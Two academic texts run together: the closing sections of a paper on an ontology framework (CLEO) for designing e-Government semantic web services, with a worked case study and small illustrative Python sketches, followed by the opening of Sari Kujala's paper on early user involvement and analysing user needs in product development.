The first step of the Viewpoint analysis is to identify the main concepts of the domain and to describe the states of affairs where the services are requested and provided within the life event. More than one state of affairs can be identified within a life event, e.g. the initial and the final states of affairs. Each state of affairs defines the involved actors, resources, information, attributes, functional and non-functional parameters, and the relations among them. The concepts identified in this analysis enrich the Domain Ontology (Figure 6). On the basis of the descriptive entities used, we distinguish some sub-classes of the State-of-Affair-Description: e.g. *Service-Request*, defining a situation where an applicant requires services, and *Processed*, defining a situation where one or more activities have been executed.
In the following, as an example, we summarize the analysis of the *case worker* viewpoint.
A *case worker* is involved in two main situations connected to the patient moves house life event: (i) collecting patient information and notifying his/her change of address; (ii) checking the patient’s eligibility for old and new services and benefits, and eventually opening a new patient assessment. These two situations have been mapped onto two pairs of initial and final state-of-affairs descriptions: *Change-of-Address* and *New-Patient-Assessment*. The initial ones are descriptions of service-request states of affairs, while the final ones are descriptions of processed states of affairs.
For instance, the New-Patient-Assessment initial state of affairs describes a situation where a *patient* speaks with a *case worker* of a community care department, and supplies him/her with the *new address* and moving *date* information.
The case worker retrieves more *information about the patient* from the system, and then notifies the new data. In this paragraph, italic words represent elicited concepts of the context that have been used to describe the viewpoint.
Note the absence of dynamics in the description. The case worker requires and supplies information, but we do not know when or how.
### Interaction analysis
The Interaction Description Module represents an agreement between user and provider – or provider and provider – viewpoints about how to consume services and exchange resources. It is the unique point of contact: a shared module that represents knowledge crossing multiple viewpoints. It allows the capture of context elements and requirements that cannot be caught in other CLEO modules, and also the checking of existing ones. The core of the module is the transition-event. It gathers the elements that allow the representation of the involved agents, sequences of transitions, activation states, exchanged resources, and eventual data and process differences between two viewpoints. Because of the heterogeneity of the viewpoints, we may expect at least two distinct counterparts of each involved descriptive entity: one (or more) from the domain ontology of the source viewpoint and one (or more) from the domain ontology of the destination viewpoint. This simple mechanism allows the representation of data and process mismatches between the shared elements of the two viewpoints. Owing to the limited space available, we cannot detail all of the aspects connected to the interaction module.
Based on such a module, the present analysis refines the existing descriptions, considering new aspects such as the dynamics of the scenario (i.e. the interaction between viewpoints), the source and the destination of the exchanged resources, the conditions for exchanging resources, etc. This means that elements captured by one viewpoint can be introduced into other viewpoints. The constraints defined in the interaction module impose a rigorous check on the definition of the new elements. In particular, they require that concepts playing a state or resource role in a transition also play a role in a defined state-of-affairs description.
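This consistency constraint can be checked mechanically. The sketch below is a hypothetical, simplified encoding (all dictionary shapes and the function name are our own illustration, not part of CLEO): it flags any concept that plays a state or resource role in a transition without also playing a role in some state-of-affairs description.

```python
# Hypothetical sketch of the interaction-module constraint: every concept
# playing a state or resource role in a transition must also play a role
# in a state-of-affairs description. Names are illustrative only.

def check_transition_consistency(transitions, state_of_affairs):
    """Return (transition, concept) pairs that violate the constraint."""
    # concepts already playing a role in some state-of-affairs description
    described = {c for soa in state_of_affairs for c in soa["roles"]}
    violations = []
    for t in transitions:
        for concept in t["states"] + t["resources"]:
            if concept not in described:
                violations.append((t["name"], concept))
    return violations

transitions = [
    {"name": "list-equipments-event",
     "states": ["patient-weight", "patient-impairment"],
     "resources": ["list-equipments"]},
]
state_of_affairs = [
    {"name": "New-Patient-Assessment-initial",
     "roles": ["patient-information", "new-address", "list-equipments"]},
]

# patient-weight and patient-impairment are flagged, mirroring the
# refinement of the case worker viewpoint described in the text
print(check_transition_consistency(transitions, state_of_affairs))
```

Running such a check during the interaction analysis is what surfaces the missing attributes before the SWS descriptions are created.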
In the patient moves house life event, we described five interactions between the three involved viewpoints: case worker, community care, and housing department. Figure 7 depicts the interaction descriptions linking the three viewpoints. The arrows indicate the direction of the transferred value: one-way arrows represent a communication interaction; two-way arrows represent a transactional interaction.
As an example, we consider the Open-assessment-description. It is a transaction that exchanges values between the case worker and the housing department in order to supply new care equipment to the patient and thus open an assessment. It describes two transition events that respectively represent: (i) a query by the case worker in order to obtain the list of care equipment that a patient can use; (ii) the opening of a new patient assessment based on the available equipment. The two italic words represent the exchanged resources. The activation conditions of the two transitions impose the existence of specific parameters. In particular, in the first transition they require the existence of the patient-weight and patient-impairment attributes. Checking the constraints imposed by the module highlights that the domain concepts selected by these descriptive entities do not play a role in the state-of-affairs descriptions of the case worker viewpoint. This leads to the necessity of refining the New Patient Assessment initial state of affairs (the one provided as an example in the previous State of Affair analysis), introducing two new attributes that specialize the descriptive entity patient-information.
The check revealed a shortcoming in the state of affairs analysis. The bug concerned two possible service inputs, and thus its early discovery avoided problems at the SWS definition level. For instance, developers could have created a goal description using generic information about the patient as inputs, while a web service satisfying the goal used weight and impairment information as inputs. Such a mismatch could be solved only by introducing complex mediators between the goal and web service descriptions.
Both resource and activation elements select distinct concepts from the two distinct domains. This represents a data mismatch that will be solved later in the Service Ontology with the creation of appropriate OO-mediators.
**Conception analysis**
The conception analysis allows us to describe what an actor may conceive in a particular state of affairs. The conception description is the core of each viewpoint, linking together all of the elements. Each viewpoint naturally focuses on different aspects of a life event: the user viewpoint includes the description of his/her needs; the provider viewpoint defines the offers; the manager viewpoint defines the policies that influence the service implementations; the politician viewpoint describes the laws that rule the scenario. The user and provider viewpoints represent the configuration knowledge of the scenario. The manager and politician viewpoints represent the re-configuration knowledge, which drives the evolution of the scenario. A change in an element of the re-configuration knowledge level may produce changes in the other elements of the scenario. Changes can be propagated following the chain created by the influence relations that link the conception description elements.
In this case study, we focus on the configuration and service delivery knowledge levels. In the specific cases of user and provider viewpoints, the created need and offer descriptions link to one or more interaction descriptions. Goal and service descriptions represent the decomposition of the conception into active/computable steps that link to specific transitions of the associated interaction description.
A complex service is a service whose functional decomposition into sub-services can be represented by means of a plan description. Sub-services may be known a priori – in which case we speak of composition of services – or their functionalities may be delegated to unknown external services by means of a need description – in which case we speak of integration of services. Thus, a service may be decomposed in terms of service-description or need-description concepts.
As an example, we consider the definitions associated with the open-assessment-need defined by the case worker and the open-assessment-offer defined by the housing department. They both refer to the interaction open-assessment-description described in the previous phase. Figure 8 depicts the specific situation we are going to describe. Note that the interaction and conception description modules are tightly connected. The mechanism of need/goal and offer/service decomposition allows knowledge to be modelled at different levels of granularity, fitting project-specific requirements, and allows the representation of complex interactions that cannot be captured by current one-shot SWS approaches.
**open-assessment-need:** the case worker needs to open a new assessment, after checking the list of care equipment for which a patient is eligible. It uses the following two goals: list-equipments-goal and open-assessment-goal. These goals are respectively invocation for the transitions list-equipments-event and open-assessment-event (Figure 8).
Figure 8: Links between Need and Offer Descriptions through the Interaction Description (gray boxes).
The need description uses the plan open-assessment-need-plan for representing the sequence of the two goals.
open-assessment-offer: the housing department offers to open a new assessment after supplying the list of care equipment for which a patient is eligible. It uses the following two services: list-equipments-service and open-assessment-service (Figure 8). The former is execution for the transition list-equipments-event; the latter is execution for the transition open-assessment-event.
The service list-equipments-service is a complex service that uses the need description retrieve-list-equipments-need to describe a delegation in terms of the following three goals: finds-items-matching-weight-goal, finds-items-matching-impairment-goal, and list-intersection-goal. The first requires a service that finds care equipment for a patient with a specific weight, the second a service that finds care equipment for a patient with a specific impairment, and the third a service that intersects the results of the previous two. The need description specifies the plan retrieve-list-equipments-need-plan that arranges the three goals.
Plan analysis
This is the last stage of the viewpoint analysis. Each viewpoint is completed with the description of all of the plans that describe procedures, processes, etc.
In our approach, we take advantage of a number of concepts from the Ontology of Plans, which is a module of the D&S ontology. Among other features, it allows the division of tasks into elementary and control tasks, and the construction of complex tasks from elementary ones. In other words, we can describe both simple (e.g. workflow) and complex (e.g. scheduling) plans, adapting to the needs and skills of the different actors: users, managers, organizations, etc. However, further specific approaches used by the involved organizations may be adopted by simply extending this module.
The plans organize goals or services within a need or offer description, or needs and offers within a life event description (viewpoint). For instance, the plan for the needs of the case worker viewpoint describes the following sequence:
1. Get patient information;
2. Notify change of address;
3. Cancel services;
4. Open assessment.
The sequence represents the four steps that a case worker should follow in order to accomplish all the tasks connected to a patient moves house life event.
As a further example, we consider the complex service introduced in the previous phase: list-equipments-service. It delegates its functionalities by means of a need description that contains three goals. Two of them ask for a list of equipment on the basis of the client’s weight and impairment, respectively. The third asks for the intersection of the two above lists and can be invoked only after the other two. The associated plan introduces the following pair of control tasks: any-order-task and syncro-task. All of the tasks within the any-order-task can be executed in any order. The syncro-task synchronizes the previous tasks before the execution of the last one. As a result, the plan can be represented as the following sequence:
1. any-order-task
2. finds-items-matching-weight-goal
3. finds-items-matching-impairment-goal
4. syncro-task
5. list-intersection-goal
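The five-step plan above can be given a small executable sketch. This is an assumed encoding, not CLEO's actual representation: the any-order-task groups the two matching goals (any permutation is valid; here they run as listed), and the syncro-task acts as a barrier before the intersection goal.

```python
# Illustrative-only encoding of the plan for list-equipments-service.
plan = [
    ("any-order-task", ["finds-items-matching-weight-goal",
                        "finds-items-matching-impairment-goal"]),
    ("syncro-task", None),
    ("task", "list-intersection-goal"),
]

def execute(plan, run_goal):
    """Walk the plan: goals inside an any-order-task may run in any
    order (here: as given); syncro-task is a barrier ensuring all
    previous tasks have completed before continuing."""
    for kind, body in plan:
        if kind == "any-order-task":
            for goal in body:
                run_goal(goal)
        elif kind == "syncro-task":
            pass  # barrier: all prior goals are done at this point
        else:
            run_goal(body)

trace = []
execute(plan, trace.append)
print(trace)  # intersection goal always comes last
```

Any interleaving of the first two goals is legal; the barrier only guarantees both finish before list-intersection-goal starts.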
Model Specific Scenario
Once the generic model has been created, it is tested with a specific scenario to assess its viability. We create instances of the concepts of the Domain Ontology (e.g. the Essex county council, the Chelmsford district council, dummy citizens and case workers, etc.). These instances populate the lexical layer of the ontological framework.
Further instances may specialize all of the descriptions of the context, describing specific cases. These instances are created starting from the lexical layer: we select instances of the Domain Ontology, we create instances of the descriptive entities that are played by such instances, and then we compose them into an instance of a context description. This is a sort of reverse path compared with the one we adopted for eliciting the knowledge. For example, an instance of a viewpoint description (e.g. the case worker viewpoint) is built by selecting the instances playing a role in the description (e.g. Jessica, Robert, Essex, etc.), creating the instances of the roles of the description (e.g. jessica-patient, robert-case-worker, essex-county-council, etc.), and finally composing the situation following the defined relations (e.g. jessica-patient speaks with robert-case-worker, etc.). The result is a specific description of a scenario.
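The reverse path can be sketched in a few lines. All structures below are hypothetical simplifications for illustration: pick domain instances, bind each to a role (descriptive entity), then compose the situation by asserting the relations of the description.

```python
# Hypothetical sketch of instantiating a viewpoint description from the
# lexical layer. Instance and role names follow the example in the text.
domain_instances = {"Jessica": "Citizen",
                    "Robert": "CaseWorker",
                    "Essex": "CountyCouncil"}

def play_role(instance, role):
    # a role instance binds a domain instance to a descriptive entity
    return {"instance": instance, "plays": role}

jessica_patient = play_role("Jessica", "patient")
robert_case_worker = play_role("Robert", "case-worker")

# compose the situation following the relations defined in the description
situation = {
    "description": "case-worker-viewpoint",
    "relations": [("speaks-with", jessica_patient, robert_case_worker)],
}
print(situation["relations"][0][0])
```

A reasoner over such instances can then check whether every relation required by the description is actually satisfiable with the selected role players.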
The creation of instances is a useful means of checking the consistency of the created descriptions. Inferences based on the axioms and rules of CLEO can help in the creation of the instances (e.g. we can infer the elements of a transition starting from the defined elements of the related states of affairs), as well as identify any gaps in the model. This is the second and more accurate check point of the model (the first was the interaction analysis). In fact, we are able to test all the inference paths provided by the axiomatization of CLEO.
Create the SWS descriptions
The model created so far describes the context where the services are requested and provided and the involved concepts (Figure 9). The obtained descriptions may be the input for the creation of WSMO goals and web services.
As an example, we report the definitions of goal, web service, and mediator connected to the open assessment transaction between the case worker and housing department viewpoints.
The first step is to create the WSMO-goal description. The reference goal in the context is the list-services-goal, defined in the case worker viewpoint. Following the defined relations, it is possible to access its associated state-of-affairs descriptions (New Patient Assessment) and the specific transition description it is invocation for (list-equipments-resource). The axiomatization allows us to obtain the possible inputs and outputs of the WSMO goal by simply inferring the descriptive entities defined in the states of affairs (initial for inputs, final for outputs) whose counterparts in the Domain Ontology are also counterparts of state or resource elements of the associated transition. The resulting inputs are patient-weight and patient-impairment, while the output is the list of eligibility-equipments.
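The input/output inference just described is essentially a set intersection. The sketch below uses assumed, simplified inputs (flat lists of entity names rather than real ontology counterparts) to show the shape of the rule: initial-state entities that also appear among the transition's state/resource counterparts become goal inputs; final-state entities that do become goal outputs.

```python
# Simplified sketch of inferring WSMO goal inputs/outputs. Entity names
# follow the example in the text; the flat-list representation is ours.

def infer_io(initial_entities, final_entities, transition_counterparts):
    inputs = [e for e in initial_entities if e in transition_counterparts]
    outputs = [e for e in final_entities if e in transition_counterparts]
    return inputs, outputs

initial = ["patient-information", "patient-weight", "patient-impairment"]
final = ["eligibility-equipments", "notification"]
transition = {"patient-weight", "patient-impairment",
              "eligibility-equipments"}

print(infer_io(initial, final, transition))
# inputs: patient-weight, patient-impairment; output: eligibility-equipments
```

In the real framework the matching goes through Domain Ontology counterparts rather than string equality, but the selection logic is the same.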
In this case, the context does not provide any suggestion about specific capabilities for the goal. Neither the state-of-affairs descriptions nor the transition state conditions define specific constraints – except the existence of the inputs and the outputs, which is implicit in the WSMO goal input and output role definitions.
The second step is to create the WSMO-web-service description. The reference service in the context is the list-services-service, defined in the housing-department viewpoint. Using the same reasoning as in the WSMO goal case, we can create the definitions of input and output. The inputs are the client-weight and client-impairment, and the output is the list of eligibility-equipments.
Moreover, we introduce choreography and orchestration descriptions (interfaces). Each transition the service is execution for may be mapped to a choreography guarded transition. The set of all obtained guarded transitions is part of the choreography (other guarded transitions can be added by developers for managing more detailed aspects, e.g. errors, acknowledgement messages, etc.). In our example, the service description only links to the transition list-equipments-event. From such a transition, we can (i) derive the conditions of the guarded transition, referring to the transition condition list-equipments-state-condition, and (ii) define the call to a function that retrieves the transition resource element list-equipments.
The considered service is a complex service, and hence defines a functional decomposition. The orchestration is based on such a decomposition and can be defined in the format: (Sequence G1 G2 G3 M1 M2), where G1, G2 and G3 represent the goals and M1 and M2 the GG-mediators connecting them (Figure 10).
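The orchestration format (Sequence G1 G2 G3 M1 M2) can be sketched as a plain data structure. The dictionary shape and mediator identifiers below are our own illustration; the goals are the three from the functional decomposition, and a sequence of n goals needs n-1 GG-mediators to connect consecutive goals.

```python
# Illustrative representation of (Sequence G1 G2 G3 M1 M2):
# three goals in sequence, connected by two GG-mediators.
orchestration = {
    "operator": "Sequence",
    "goals": ["finds-items-matching-weight-goal",      # G1
              "finds-items-matching-impairment-goal",  # G2
              "list-intersection-goal"],               # G3
    "gg_mediators": ["M1", "M2"],  # hypothetical mediator identifiers
}

# structural sanity check: n goals require n-1 connecting mediators
assert len(orchestration["gg_mediators"]) == len(orchestration["goals"]) - 1
print(orchestration["operator"], len(orchestration["goals"]), "goals")
```

Each GG-mediator here would carry the data transformation between the output of one goal and the input of the next.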
The last step is the creation of WSMO mediator descriptions. The existence of WG-mediators and OO-mediators is proved by means of axiomatization. The mediator descriptions used in this example (Figure 10) are explained in the following.
Conclusion and Future Work
In this paper, we provide an ontological framework with which most PAs – or organizations in general – can identify, and from which they can work when designing and delivering e-Government services. This general framework can be adapted and applied as appropriate. We present our requirements and approach in the construction of the conceptual model, and briefly describe the well-known ontologies that are the basis of our framework: WSMO and DOLCE.
The framework is composed of three ontologies – the Core Life Event Ontology, the Domain Ontology, and the Service Ontology – that map a distributed e-Government service-supply scenario in which multiple actors are independent nodes describing their own knowledge, and provide mechanisms for knowledge sharing and mismatch resolution.
Our approach allows the contextualization of the e-Government scenario in terms of descriptions. In particular, we introduce the following two separations: Context vs Services and Context vs Vocabulary. The former distinguishes between the description of the environment where the services are provided, used, and managed by different actors, and the description of the actual services that can be invoked. The latter distinguishes between descriptive entities of the context, and the actual objects of the actors’ vocabulary they act upon.
As our main result, we describe the Core Life Event Ontology (CLEO), the heart of our framework, which allows the description of the configuration and re-configuration knowledge levels. It is a large ontology: it contains 242 elements, among classes, relations, axioms, and rules, composing its 6 modules. Moreover, it refers to specific modules (e.g. the Plan Ontology) provided by the D&S ontology. For these reasons, we cannot detail all of the involved aspects in this paper.
We focus on the associated knowledge elicitation methodology that first helps domain experts to create a full description of a specific e-Government context using models close to their experience and specific languages of the different involved domains, and then drives the application developers to implement SWS descriptions inferring knowledge from the context description. To introduce the methodology and associated knowledge structures, we worked out a case study within the change of circumstances scenario.
Further important aspects, simply outlined in this paper, regard the description of the evolution of the scenario based on the politician and manager viewpoints, and the mechanism based on the need/offer and interaction module for describing complex transactions between viewpoints.
Finally, future work will concern the adoption of the ontological framework as the basis of a middleware for service-oriented e-Government applications (e.g. Web Portals), i.e. creating the infrastructure for semantic interoperability.
Kujala, Sari
Effective user involvement in product development by improving the analysis of user needs
Published in:
BEHAVIOUR AND INFORMATION TECHNOLOGY
DOI:
10.1080/01449290601111051
Published: 01/01/2008
Effective user involvement in product development by improving the analysis of user needs
SARI KUJALA
Helsinki University of Technology, Software Business and Engineering Institute,
P.O. Box 9210, FIN-02015 TKK, Finland; tel. +358 50 3862768, fax +358 9 451 4958
Email: sari.kujala@tkk.fi
User involvement has been shown to be beneficial in the development of useful and usable systems. The trend of software development becoming a product-oriented activity creates challenges to user involvement. Field studies appear a promising approach, but the analysis of the gathered user needs has been shown to be demanding. This study presents, on the basis of seven case studies, an early user-involvement process showing how user needs can be analysed and how the input to product development can be identified. In addition, the process is tested in two industrial cases with interviews and a questionnaire. The results show that the process supports effective early user involvement; the resulting requirements were evaluated as more successful and their quality as better than average. However, the case studies show that user involvement not only provides useful information about users’ needs but also increases the understanding of users’ values.
Keywords: User involvement, user-centred design, product development, requirements elicitation, user need analysis, field studies
1. Introduction
User involvement is a widely accepted principle in the development of useful and usable software systems (Karat, 1997; Wilson et al., 1997; Bekker and Long, 2000). A lack of user involvement has been repeatedly associated with failed software projects, and the benefits of user involvement are shown in several studies (Kujala, 2003; Kujala et al., 2005). However, the mechanism of user involvement, what in fact makes it useful, is not so clearly formulated. There are varied approaches to user involvement and they have different rationales explaining why to involve users. For example, participatory design emphasises democracy and skill enhancement (Ehn, 1993). Other approaches focus mostly on gaining varied information from users. For example, ethnography focuses on the social aspects of human co-operation, while user-centred design and contextual design focus on the context of use.
In addition, software development is increasingly becoming a package- (or product-) oriented activity rather than a custom activity (Carmel and Becker, 1995). Product development contexts and the increasing numbers of users create special challenges to user involvement as Iivari and Iivari (2006) point out. However, participatory design, which is the principal approach to user involvement, focuses mainly on internal or custom development and efforts to adapt the approach to product development have not turned out to be
flawless (Grudin and Pruitt, 2002). Thus, the form and rationale of user involvement need to be reconsidered to fit product development purposes.
The informative role of users is one of the most prevalent rationales for user involvement, as can be seen in Gould and Lewis’ (1985) recommendation that the design team should be brought into direct contact with potential users, as opposed to hearing or reading about them through human intermediaries. In addition, Keil and Carmel (1995) suggest that it is less desirable to use indirect links to customers and users because of the information filtering and distortion that can occur when intermediaries or customer surrogates are used. Nowadays, most usability experts consider it impossible to design a usable product without getting feedback from real users; eliciting user requirements is also recommended (ISO 13407, 1999).
On the other hand, there has been discussion as to whether users should be active co-designers and not be considered informants or mere subjects (Muller et al., 1997; Olsson, 2004). Olsson (2004) points out that if users serve as information sources but have no decision-making rights, they still have little or no influence on design. She presents a qualitative analysis of the contributions to design by user representatives compared with interaction designers. One of the contributions seems to be that users had their own values compared to designers and by active participation they could convey these values and their domain knowledge for use by developers. On the basis of earlier experience, Olsson (2004) states that user representatives concentrate on functionality and effectiveness, in comparison with interaction designers, who spend more time on appearance and presentation.
The discussion so far demonstrates that user involvement is not simple information-gathering, but that developers and users have different vocabularies, interests, and values, which makes the communication and interplay complicated. On the other hand, user involvement can be seen as a potential input for designing systems that support human values. By human value, we mean anything that has personal or social worth or meaning. The values may be learned in childhood or adapted as the person takes part in a social group. Value-sensitive design has received growing attention (Friedman, 1996), but the discussion has been on a rather general level, concerning basic human values such as user autonomy, and more could be done to understand how relevant values for a particular project can be discovered (Flanagan et al., 2005).
The focus of this study is on user involvement, particularly in product-development contexts. The goal is to investigate how early user involvement can be made effective in product development, where the large number of users makes their participation impossible. User involvement is most efficient and influential in the early stages of system development, and field studies appear to be a promising approach to early user involvement. However, field studies are often found to be time consuming, and the analysis of user needs is particularly challenging.
First, the forms of user involvement and the motives as to why users should be involved are discussed. Second, user involvement and its practical realisation in product development context are described. Furthermore, on the basis of the experience gained in seven case studies, specific steps of early user involvement are presented to support the analysis and utilisation of user needs in product development. Finally, the process is evaluated in two industrial cases and the results are discussed.
2. Variety of user involvement
User involvement can be seen as a general term describing direct contact with users and covering many approaches, such as user-centred design, participatory design, ethnography, and contextual design (Kujala, 2003). Furthermore, user involvement is not a one-dimensional concept, but we need to consider the varied forms and motives of involvement in order to apply it to product development.
2.1 Forms of user involvement
The form of user involvement can be broadly characterised as being somewhere on the continuum from informative, through consultative, to participative, as illustrated in Figure 1, adapted from Damodaran (1996). Users may take active roles or they may be involved as providers of information, commentators, or objects for observations.
Figure 1. Forms of user involvement (Damodaran, 1996).
Participatory design is sometimes used interchangeably with user involvement, but it is located at the participatory end of Damodaran’s (1996) continuum. Participatory design originated in Scandinavia, where democratic participation and skill enhancement are important features of participatory design (Ehn, 1993). Thus, participatory design originally included the idea of users actively participating in design work. However, Kuhn and Muller (1993) state that outside Scandinavia, the field is more varied, with some theorists and practitioners pursuing a locally adapted form of democratic decision-making and others emphasising effective knowledge acquisition and product quality.
Thus, user involvement may have different forms; the essential distinction between these is how active the users’ roles are, whether they influence decisions, or whether they even participate in development work. The triangles in Figure 1 illustrate the typical forms of user involvement in product development compared to in-house development. Participatory design is characteristic of in-house development, in which users are known and willing to participate in development work (Rauterberg et al., 1995). It can also be the recommended form of user involvement, as users have the possibility of influencing decisions relating to the system. As is apparent from Olsson’s (2004) work, users and developers may have very different interests, values, and vocabularies. Thus, in user-centred design, user involvement may not have optimal results if it is conducted on the developers’ terms, as developers may ask questions from their own point of view and interests and make their own interpretations and decisions. On the other hand, the typical form of user involvement in product development is informative and consultative, as the potential users are not usually interested in putting effort into the development of a commercial product. However, all forms of user involvement support the different motives of user involvement discussed in the next section.
2.2 Motives for user involvement
In addition to different forms, user involvement has varied motives. Muller et al. (1997) identify three convergent motives for participatory design: 1) democracy; 2) efficiency, expertise, and quality; and 3) commitment and buy-in. The first motivation, democracy, was an essential part of the original Scandinavian formulation of participatory design. Developing workplace democracy and the development of workers’ competence and power to influence their work and their workplaces were the driving forces of the work (Ehn, 1993). Muller et al. (1997) suggest that the second type of motivation has emerged from North American practice and that direct participation by end-users is seen in this context as a means of enhancing the process of gathering (and perhaps interpreting) information for system design. The effectiveness of software design and development is improved by including the users’ expertise. Efficiency is improved by getting users to collaborate in design and by involving users early in the design process. The quality of the design and the resulting system is improved through better understanding of the users’ work and better combination of the diverse and necessary backgrounds brought by various participants. The third motivation, commitment and buy-in, means that a system is more likely to be accepted by ‘downstream’ end-users if those users are involved in certain ‘upstream’ formative activities.
Several others have identified similar kinds of motives or, in other words, benefits of user involvement (Kujala, 2003). For example, Damodaran (1996) lists the benefits that effective user involvement has been shown to yield in a variety of studies: 1) improved quality of the system arising from more accurate user requirements; 2) avoidance of costly system features that the users did not want or cannot use; 3) improved levels of acceptance of the system; 4) greater understanding of the system by the users, resulting in more effective use, and 5) increased participation in decision-making within the organisation.
In summary, the motives for user involvement can be categorised into three partly overlapping classes:
1. Democratic motives that support:
- workers’ participation in decision making and power to influence their work
- development of workers’ competence and expertise
2. Organisational motives that support:
- acceptance of the system by end-users
- learning and using of the system
3. Practical development-oriented motives that support:
- understanding the users’ work
- defining more accurate user requirements
- improving the quality of the system
- improving development efficiency
- increasing user and customer satisfaction
Figure 2 demonstrates the proposed relations of the practical development-oriented benefits of early user involvement (adapted from Kujala, 2003). Early user involvement seems to have a positive value for users and customers as such (Kujala et al., 2001a; Kujala, 2003), but user and customer satisfaction can also be considered to improve through better system quality. Requirements quality is an intermediate factor improving user and customer satisfaction in the long run: requirements quality is better, and development work is performed better, when the requirements are based on real information gained from users. In addition, users are available for giving feedback and testing design solutions. Thus, the resulting system is more likely to match the needs of the users.
3. User involvement in product development contexts
Sawyer (2000) suggests that the major differences between packaged and custom software development can be characterised as stakeholding and schedule constraints. In custom software development, the customer is the principal stakeholder and often bears a large proportion of the risk. Packaged software development, by contrast, is undertaken directly in support of the developer’s strategic business objectives. Sawyer (2000) makes the further point that packaged software development typically exploits a market opportunity without a discrete set of users who can articulate their requirements. Thus, it needs to be carefully considered how user involvement is applied in practice in product development contexts.
3.1. Practical motives of user involvement
As Grudin (1991a) describes, in product development the users often remain unknown until the product is marketed. Keil and Carmel (1995) confirmed by their survey that in the package environment over 90% of the projects relied on marketing and sales for customer input and requirements. In addition, their results show that more successful projects employed more direct links to users and customers than did less successful projects. In spite of Keil and Carmel’s (1995) positive results, it is sometimes argued that user involvement is not an appropriate approach in product development contexts. Furthermore, Grudin (1991b) and Poltrock and Grudin (1994) provide a detailed description of the organisational obstacles to direct contact between developers and users in large product development organisations. Such obstacles include challenges in motivating the developers, identifying appropriate users, obtaining access to users, motivating the users, and deriving benefits from user contacts once established. The findings of Grudin (1991b) rely on an earlier survey and on interviews with over 200 interface designers from several product development companies. Furthermore, Iivari (2004) analysed user involvement in two product development organisations. She identifies divergent views of the motivation for user involvement. Democratic goals were not mentioned, but user involvement was seen as helping the projects to ‘do a quality job’, ‘get it right the first time’, and as a selling argument and image factor for the company in making profits. Iivari (2004) argues that some of the images of user involvement identified might be interpreted as being in stark contrast with the original aims of the Scandinavian participatory tradition. Indeed, it can be argued that the characteristics of the product development context make the democratic and organisational motives of user involvement described in Section 2.2 somewhat inappropriate. For example, Karlsson et al. (2002) argue that requirements are invented by the developers, since there is not a discrete set of users who can articulate their requirements.
A large number of users makes it hard to involve users in a democratic way, and thus users cannot be committed through participation either. In addition, users may not be motivated to participate in the development work of a commercial product. Users have a large number of products to select from and, on the other hand, the product may be used in many organisations, which are not known before the product is ready. Nevertheless, all the practical development-oriented motives of user involvement described in Section 2.2 are valid for product development. Even if users may not be motivated to participate in the development work, several cases show that, at least to some extent, they are interested in providing information and feedback (Kujala, 2002). Users want good-quality products and better support for their tasks, and so appreciate their views being considered. They are experts in domain knowledge, their tasks and work practices, behaviour and preferences, and the general context of use. By gathering this information, it is possible to define user requirements more accurately and, by doing so, create better system quality. Furthermore, better development performance is based on gathering correct information sufficiently early.
3.2. Understanding user needs
There are several usability methods that are suitable in the product-development context (e.g. ISO/TR 16982, 2002). However, user involvement is most efficient and influential in the early stages of system development, as the costs involved in making changes increase as the development continues (cf. Ehrlich and Rohn, 1994; Noyes et al., 1996). Thus, ISO 13407 (1999) emphasises the importance of user involvement in understanding and specifying the context of use, which is the basis of specifying user and organisational requirements. The context of use is defined as the users, tasks, equipment, and the physical and social environments in which a product is used. In a similar vein, Gulliksen et al. (2003) describe in their principles for user-centred system design the importance of understanding the context of use in order to create and maintain a focus on user rather than technical needs. Thus, understanding user needs as they are interwoven with the context of use is one of the principal goals of user involvement. Users do not need to conceptualise the context of use, but it nevertheless defines the limits and possibilities the users have in achieving their goals. Thus, we define user needs as problems that hinder users in achieving their goals in a specified context of use. Understanding the context of use is not valuable as such; rather, we need to understand user needs or, in other words, how the future product can support users in achieving their goals in a specified context of use.
4. Field studies as an approach to gathering user needs
As discussed above, understanding user needs is one of the main goals of user involvement. Field studies are an approach focusing on early user involvement and gathering information from users about their needs. Field studies mean that users and their tasks and environments are studied in their actual context using qualitative methods (cf. Wixon et al., 2002). As field studies are qualitative by nature, the number of participating users is typically not large, but the goal is to select representative users and understand in depth their needs and the typical context of use. Hackos and Redish (1998) describe an extensive range of field methods and provide practical advice on conducting field studies.
4.1 Benefits and challenges of field studies
A literature review of field studies reveals many positive experiences (Kujala, 2003). For example, it was felt that more accurate user requirements were gathered and user needs were better reported. In addition, positive customer and user responses were reported. On the other hand, many challenges to the improvement of field study techniques exist, in particular, how to analyse a large amount of data. The information gathered from users is descriptive and informal by nature, and analysing it is time demanding. The problems were repeatedly reported in the book ‘Field Methods Casebook for Software Design’ edited by Wixon and Ramey (1996). Field studies are often seen as time consuming, providing a vast amount of unstructured data that is difficult to use in development (e.g. Bly, 1997; Hynninen et al., 1999). Moreover, fieldworkers have been found to have problems with communicating results to system developers and with influencing design work (Plowman et al., 1995). Even though field studies are considered beneficial, they are not widely used in practice. For example, the results of a recent survey of user-centred practitioners show that the practitioners themselves consider field studies and user-requirement analysis most important, although not as widely used as other approaches (Vredenburg et al., 2002). The main reason is probably the above-mentioned challenges in analysing user needs. These challenges need to be addressed to make field studies sufficiently practical.
4.2 Analysing user needs and discovering relevant issues
The power of field studies lies in deeply understanding the context of use. However, this is not a trivial task: the context includes a huge amount of detail, but only some of it is relevant for development. For example, Greenberg (2001) provides a summary based on several theories, stating that context is a dynamic construct, changing moment by moment, which people interpret in order to perform actions.
In addition to the complexity of the context of use, interpreting and analysing the context of use for development purposes is challenging. As Olsson (2004) argues, people are often preoccupied with the current work situation and its inherent routines, but are not so concerned with delivering the appropriate design demands upfront. Thus, because users do not have the professional skills to define user requirements, the task of analysing user needs and translating them into user requirements is left to developers. For example, Beyer and Holtzblatt (1998) state that design begins with a creative leap from customer data to the implications for design and from implications to ideas for specific features. In addition, they describe using customer data as a new skill. They recommend recognising the overall work situation and envisioning an integrated solution.
As a solution, Contextual Design provides five work models to represent customer work practice (Beyer and Holtzblatt, 1998). The flow model represents the communication and coordination necessary to do the work. The sequence model shows the detailed work steps necessary to achieve an intention. The artefact model shows the physical objects created to support the work, along with their structure, usage, and intent. The cultural model represents the constraints on the work caused by policy, culture, or values. The physical model shows the physical structure of the work environment as it affects the work. These models are then consolidated into models characterising the work structure and basic work strategies across all customers.
